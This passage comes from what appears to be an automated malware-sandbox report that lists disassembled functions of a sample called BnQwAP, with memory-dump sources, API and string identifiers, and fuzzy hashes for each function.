                                                                                                                    • Instruction Fuzzy Hash: 5DF06D14F1870242FB552BB7BA5927813536F5AB49F8C5430C90AE3291DE7FA89DC640
                                                                                                                    Function 00007FF6560503F8 Relevance: 7.5, APIs: 5, Instructions: 26threadCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.1753585817.00007FF655FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF655FE0000, based on PE: true
                                                                                                                    • Associated: 00000010.00000002.1753559960.00007FF655FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF656095000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF6560B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753717130.00007FF6560CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753740589.00007FF6560D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_7ff655fe0000_BnQwAP.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Thread$CurrentProcessWindow$AttachInputMessageSendTimeout
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 179993514-0
                                                                                                                    • Opcode ID: 3c9aaefa71688af513bcff76e9269722b622f20c654f000aa95846671475ad7f
                                                                                                                    • Instruction ID: 468f25857b352c1bc47c651413891660a82fb54f1afa300f0ad9e7bf7e5f732f
                                                                                                                    • Opcode Fuzzy Hash: 3c9aaefa71688af513bcff76e9269722b622f20c654f000aa95846671475ad7f
                                                                                                                    • Instruction Fuzzy Hash: 11F03954F1860282FB151BB6BA4927A13526FA9749F8C5430CC0BA3252DD3FA89DCA00
                                                                                                                    Function 00007FF656065F2C Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 300comCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.1753585817.00007FF655FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF655FE0000, based on PE: true
                                                                                                                    • Associated: 00000010.00000002.1753559960.00007FF655FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF656095000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF6560B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753717130.00007FF6560CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753740589.00007FF6560D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_7ff655fe0000_BnQwAP.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CreateFullInitializeInstanceNamePathUninitialize
                                                                                                                    • String ID: .lnk
                                                                                                                    • API String ID: 3769357847-24824748
                                                                                                                    • Opcode ID: e9a41c1307533edd4d22b0f8b30ca28bda216ecff893dec0b295dcafc10e7183
                                                                                                                    • Instruction ID: 9537262e246fbe97b83ea7c026e8c729797676a4d9becde8038e3ba05077c868
                                                                                                                    • Opcode Fuzzy Hash: e9a41c1307533edd4d22b0f8b30ca28bda216ecff893dec0b295dcafc10e7183
                                                                                                                    • Instruction Fuzzy Hash: 04D18076B18A5685EB10DF66D1902AD37B0FB48F88F484036DE4DA7B55DF3AD889C340
                                                                                                                    Function 00007FF656020040 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 205COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.1753585817.00007FF655FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF655FE0000, based on PE: true
                                                                                                                    • Associated: 00000010.00000002.1753559960.00007FF655FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF656095000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF6560B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753717130.00007FF6560CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753740589.00007FF6560D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_7ff655fe0000_BnQwAP.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _invalid_parameter_noinfo
                                                                                                                    • String ID: UTF-16LEUNICODE$UTF-8$ccs
                                                                                                                    • API String ID: 3215553584-1196891531
                                                                                                                    • Opcode ID: c3c6110ef47f8474b3aee38d103288009a94a732d54534d718fbbb8757739500
                                                                                                                    • Instruction ID: b9d03a017b7b4fb70f97e47681d9640ac682cedb3506c5cc7b89f1bd4116b994
                                                                                                                    • Opcode Fuzzy Hash: c3c6110ef47f8474b3aee38d103288009a94a732d54534d718fbbb8757739500
                                                                                                                    • Instruction Fuzzy Hash: 30815BB2E0830286FB654F15DB5027E66A0AF11788F5C8036DA0FF7695DE6FA998D201
                                                                                                                    Function 00007FF65600B1E8 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 150COMMONLIBRARYCODE
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.1753585817.00007FF655FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF655FE0000, based on PE: true
                                                                                                                    • Associated: 00000010.00000002.1753559960.00007FF655FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF656095000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF6560B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753717130.00007FF6560CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753740589.00007FF6560D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_7ff655fe0000_BnQwAP.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _invalid_parameter_noinfo
                                                                                                                    • String ID: $*
                                                                                                                    • API String ID: 3215553584-3982473090
                                                                                                                    • Opcode ID: e1993591883a1ee4d578272befcf29134d05160a5f94b748d186053ef0cddf2b
                                                                                                                    • Instruction ID: 7baf4fa0711fdbdafaa8e88b46dba49afa138708cb0501c4ce482fb99cf51867
                                                                                                                    • Opcode Fuzzy Hash: e1993591883a1ee4d578272befcf29134d05160a5f94b748d186053ef0cddf2b
                                                                                                                    • Instruction Fuzzy Hash: 8E61647290C24287E765AF24825537C3BA1FB49B28FAC1135C64AE62D9CF6BE849C705
                                                                                                                    Function 00007FF656016148 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 144COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.1753585817.00007FF655FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF655FE0000, based on PE: true
                                                                                                                    • Associated: 00000010.00000002.1753559960.00007FF655FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF656095000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF6560B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753717130.00007FF6560CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753740589.00007FF6560D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_7ff655fe0000_BnQwAP.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _set_statfp
                                                                                                                    • String ID: !$acos
                                                                                                                    • API String ID: 1156100317-2870037509
                                                                                                                    • Opcode ID: 0d89aa78777a41b63d954a76095aee346a1dbdd639e7adc8a9fc006d5894d638
                                                                                                                    • Instruction ID: 5af868f0e32203c3050be8d1580b92feee657f2d963ac458c66ee49c5fe7a8d3
                                                                                                                    • Opcode Fuzzy Hash: 0d89aa78777a41b63d954a76095aee346a1dbdd639e7adc8a9fc006d5894d638
                                                                                                                    • Instruction Fuzzy Hash: AB610521D28F4589E223CB349D113769755BFA63D8F188336E91EB6A64DF2EE086C600
                                                                                                                    Function 00007FF656016408 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 138COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.1753585817.00007FF655FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF655FE0000, based on PE: true
                                                                                                                    • Associated: 00000010.00000002.1753559960.00007FF655FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF656095000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF6560B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753717130.00007FF6560CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753740589.00007FF6560D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_7ff655fe0000_BnQwAP.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _set_statfp
                                                                                                                    • String ID: !$asin
                                                                                                                    • API String ID: 1156100317-2188059690
                                                                                                                    • Opcode ID: dda4458e7c1e859fb838f80da50bdd89987d805c8091ebd73b4f99c53429eb29
                                                                                                                    • Instruction ID: 5c5268dbf0d99d3d1b3eb68317ec559530b3f96ac80f0385192bdd30d2e5464c
                                                                                                                    • Opcode Fuzzy Hash: dda4458e7c1e859fb838f80da50bdd89987d805c8091ebd73b4f99c53429eb29
                                                                                                                    • Instruction Fuzzy Hash: 3561F822C28F8589E213CB349D113769759BF963D8F14C332E95EB6A65DF3EE086C640
                                                                                                                    Function 00007FF65605A6BC Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 101windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.1753585817.00007FF655FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF655FE0000, based on PE: true
                                                                                                                    • Associated: 00000010.00000002.1753559960.00007FF655FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF656095000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF6560B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753717130.00007FF6560CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753740589.00007FF6560D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_7ff655fe0000_BnQwAP.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Menu$Delete$InfoItem
                                                                                                                    • String ID: P
                                                                                                                    • API String ID: 135850232-3110715001
                                                                                                                    • Opcode ID: 7a885196f2dcceb0a8221e88f5e4acf8149e86b4233e81131ef081c483961346
                                                                                                                    • Instruction ID: e63196f391c8c51a79e044e3dcb077c87731ee3ce3a6ad747cb5d39b1285dbcd
                                                                                                                    • Opcode Fuzzy Hash: 7a885196f2dcceb0a8221e88f5e4acf8149e86b4233e81131ef081c483961346
                                                                                                                    • Instruction Fuzzy Hash: FF41F232A04A9181EB61CF25C5443AD67A1FB94FA0F5E8231EA2D977C5DF3ED84AC700
                                                                                                                    Function 00007FF65608B454 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 96COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.1753585817.00007FF655FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF655FE0000, based on PE: true
                                                                                                                    • Associated: 00000010.00000002.1753559960.00007FF655FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF656095000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF6560B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753717130.00007FF6560CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753740589.00007FF6560D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_7ff655fe0000_BnQwAP.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Window$Long
                                                                                                                    • String ID: SysTreeView32
                                                                                                                    • API String ID: 847901565-1698111956
                                                                                                                    • Opcode ID: efcadc7bc094786019cbc8bf8bf3fbcf06e95b4321d3c984f5b6707381f7f713
                                                                                                                    • Instruction ID: 139d8a555a5a592cb9b272aa4d6368de5ef8f737fae58d3667e36ce4a58c5600
                                                                                                                    • Opcode Fuzzy Hash: efcadc7bc094786019cbc8bf8bf3fbcf06e95b4321d3c984f5b6707381f7f713
                                                                                                                    • Instruction Fuzzy Hash: B6417B32A097828AE770DB28E544B9A77A1F784764F184335DAA853BA8CF3DD845CF40
                                                                                                                    Function 00007FF65608B798 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 80windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.1753585817.00007FF655FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF655FE0000, based on PE: true
                                                                                                                    • Associated: 00000010.00000002.1753559960.00007FF655FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF656095000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF6560B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753717130.00007FF6560CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753740589.00007FF6560D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_7ff655fe0000_BnQwAP.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: MessageSend$Window$CreateDestroyObjectStock
                                                                                                                    • String ID: msctls_updown32
                                                                                                                    • API String ID: 1752125012-2298589950
                                                                                                                    • Opcode ID: 74e3ad92c2baccfb6081841c4f4ce29bd6f6c1edab28d3e774f2eecd82cc7261
                                                                                                                    • Instruction ID: bff6b0a8de9a94fb3f626d0a1ef5d79b40994cb6a8c9401d45ca077d6e3c3783
                                                                                                                    • Opcode Fuzzy Hash: 74e3ad92c2baccfb6081841c4f4ce29bd6f6c1edab28d3e774f2eecd82cc7261
                                                                                                                    • Instruction Fuzzy Hash: 8531C732A18B85D6EB60CF15E5403AA7361FBC5B95F588136DA8D93B94CF3DD449CB00
                                                                                                                    Function 00007FF65608A1F0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 79windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.1753585817.00007FF655FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF655FE0000, based on PE: true
                                                                                                                    • Associated: 00000010.00000002.1753559960.00007FF655FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF656095000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF6560B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753717130.00007FF6560CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753740589.00007FF6560D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_7ff655fe0000_BnQwAP.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: MessageSend$Window$CreateMoveObjectStock
                                                                                                                    • String ID: Listbox
                                                                                                                    • API String ID: 3747482310-2633736733
                                                                                                                    • Opcode ID: 4629ce28c24575fa998f22937708fe0feac1f339ddb28addb223e5ca3634c4d7
                                                                                                                    • Instruction ID: 9d396b7a9a0e630577a0698f85061d654eb3df6909f6e1ba6db32a266c7c43aa
                                                                                                                    • Opcode Fuzzy Hash: 4629ce28c24575fa998f22937708fe0feac1f339ddb28addb223e5ca3634c4d7
                                                                                                                    • Instruction Fuzzy Hash: 11315A366097C186E770CF16F444A5AB7A1F7887A4F548225EAA913BA8DF3DD885CF00
                                                                                                                    Function 00007FF65608B104 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 66windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.1753585817.00007FF655FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF655FE0000, based on PE: true
                                                                                                                    • Associated: 00000010.00000002.1753559960.00007FF655FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF656095000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF6560B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753717130.00007FF6560CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753740589.00007FF6560D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_7ff655fe0000_BnQwAP.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: MessageSend$CreateObjectStockWindow
                                                                                                                    • String ID: msctls_trackbar32
                                                                                                                    • API String ID: 1025951953-1010561917
                                                                                                                    • Opcode ID: d23565779f05c86e88825c5223c790f228a79c76439431c452903b53a7f93148
                                                                                                                    • Instruction ID: f67d5bdd3505ce50c361b4b96f94cf6c5dc3c506a98e38627e35d2b5a50e9fd2
                                                                                                                    • Opcode Fuzzy Hash: d23565779f05c86e88825c5223c790f228a79c76439431c452903b53a7f93148
                                                                                                                    • Instruction Fuzzy Hash: C1314832A096818BE770CF15E544B5AB7A1FB88B94F144239EB9853B58CF3DD846CF04
                                                                                                                    Function 00007FF65604F5CC Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.1753585817.00007FF655FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF655FE0000, based on PE: true
                                                                                                                    • Associated: 00000010.00000002.1753559960.00007FF655FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF656095000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF6560B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753717130.00007FF6560CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753740589.00007FF6560D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_7ff655fe0000_BnQwAP.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Thread$CurrentProcessWindow$AttachChildClassEnumFocusInputMessageNameParentSendTimeoutWindows
                                                                                                                    • String ID: %s%d
                                                                                                                    • API String ID: 2330185562-1110647743
                                                                                                                    • Opcode ID: 4f7089e3504d96f16b1fb726daf46c0f00a77062a3aa85cf481a60796f0195a0
                                                                                                                    • Instruction ID: 367fd01e30dfa5ac824752bb1a1e15d59dd2765c368ea3323ac5d830f4a73c00
                                                                                                                    • Opcode Fuzzy Hash: 4f7089e3504d96f16b1fb726daf46c0f00a77062a3aa85cf481a60796f0195a0
                                                                                                                    • Instruction Fuzzy Hash: 53219171B08B8291EA24EB12E6442FE6361EB95BC4F484031DEDDA3765DE6DE109C701
                                                                                                                    Function 00007FF656008782 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 63COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.1753585817.00007FF655FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF655FE0000, based on PE: true
                                                                                                                    • Associated: 00000010.00000002.1753559960.00007FF655FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF656095000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF6560B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753717130.00007FF6560CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753740589.00007FF6560D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_7ff655fe0000_BnQwAP.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Exception$DestructObject$Raise__vcrt_getptd_noexit
                                                                                                                    • String ID: csm
                                                                                                                    • API String ID: 2280078643-1018135373
                                                                                                                    • Opcode ID: f3b44f69e9663573439d22a4e4da11b073c1d9211702bf15dcc91806c3a7fe41
                                                                                                                    • Instruction ID: 67afd7e65e94e5b31594923bf2ca89060e383ca2374f521beee942e762d59958
                                                                                                                    • Opcode Fuzzy Hash: f3b44f69e9663573439d22a4e4da11b073c1d9211702bf15dcc91806c3a7fe41
                                                                                                                    • Instruction Fuzzy Hash: 3B21823660864182E770DF16E54026E77A1FB89BB4F880235DE8D53795CF7EE98ACB00
                                                                                                                    Function 00007FF65605C110 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58fileCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.1753585817.00007FF655FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF655FE0000, based on PE: true
                                                                                                                    • Associated: 00000010.00000002.1753559960.00007FF655FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF656095000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF6560B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753717130.00007FF6560CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753740589.00007FF6560D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_7ff655fe0000_BnQwAP.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CloseControlCreateDeviceFileHandle
                                                                                                                    • String ID: 0
                                                                                                                    • API String ID: 33631002-4108050209
                                                                                                                    • Opcode ID: 122fac756a3aebd614dbe24bd4d9d3fcd08661cb9d9b68eb4b308195107418d6
                                                                                                                    • Instruction ID: c98e927c54a6f6c0b13e4ab4e00c1a3a620c67b4a203f3a0be8088b3c7ef902e
                                                                                                                    • Opcode Fuzzy Hash: 122fac756a3aebd614dbe24bd4d9d3fcd08661cb9d9b68eb4b308195107418d6
                                                                                                                    • Instruction Fuzzy Hash: 6821A332618B80C6D3208F21E48469A77B4F3857A4F14422AEB9D53B94CF3DC659CB00
                                                                                                                    Function 00007FF6560810C8 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 20libraryloaderCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.1753585817.00007FF655FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF655FE0000, based on PE: true
                                                                                                                    • Associated: 00000010.00000002.1753559960.00007FF655FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF656095000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF6560B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753717130.00007FF6560CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753740589.00007FF6560D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_7ff655fe0000_BnQwAP.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AddressLibraryLoadProc
                                                                                                                    • String ID: RegDeleteKeyExW$advapi32.dll
                                                                                                                    • API String ID: 2574300362-4033151799
                                                                                                                    • Opcode ID: 88aa4d55391e805054e25835240c34e867389002f23d272af78df165a122bac4
                                                                                                                    • Instruction ID: 460d214327eff40c65d3b5ef1b6f22ab0c6863f27575122ffff0b6e2d3fe8e01
                                                                                                                    • Opcode Fuzzy Hash: 88aa4d55391e805054e25835240c34e867389002f23d272af78df165a122bac4
                                                                                                                    • Instruction Fuzzy Hash: CFE0E521A06F06C2EF15CB21E51436823A1EF18B59F8C4435C91D96360EFBED6ADC340
                                                                                                                    Function 00007FF655FE6D64 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 20libraryloaderCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.1753585817.00007FF655FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF655FE0000, based on PE: true
                                                                                                                    • Associated: 00000010.00000002.1753559960.00007FF655FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF656095000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF6560B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753717130.00007FF6560CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753740589.00007FF6560D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_7ff655fe0000_BnQwAP.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AddressLibraryLoadProc
                                                                                                                    • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                                                                                    • API String ID: 2574300362-3689287502
                                                                                                                    • Opcode ID: 0d692eaeaee984e821757872aa743bf672a5f4ffbc2c7638c6bb6d49df66a179
                                                                                                                    • Instruction ID: a2bef9efd7c59db37fb22909118e9dd1b00c1736a8ee98ac0d80e316cfab63a0
                                                                                                                    • Opcode Fuzzy Hash: 0d692eaeaee984e821757872aa743bf672a5f4ffbc2c7638c6bb6d49df66a179
                                                                                                                    • Instruction Fuzzy Hash: 67E0ED25915F0681EF158B61E51836823E5FB08B4CF884835C91D97364EFBDE998C740
                                                                                                                    Function 00007FF6560532F4 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 19libraryloaderCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
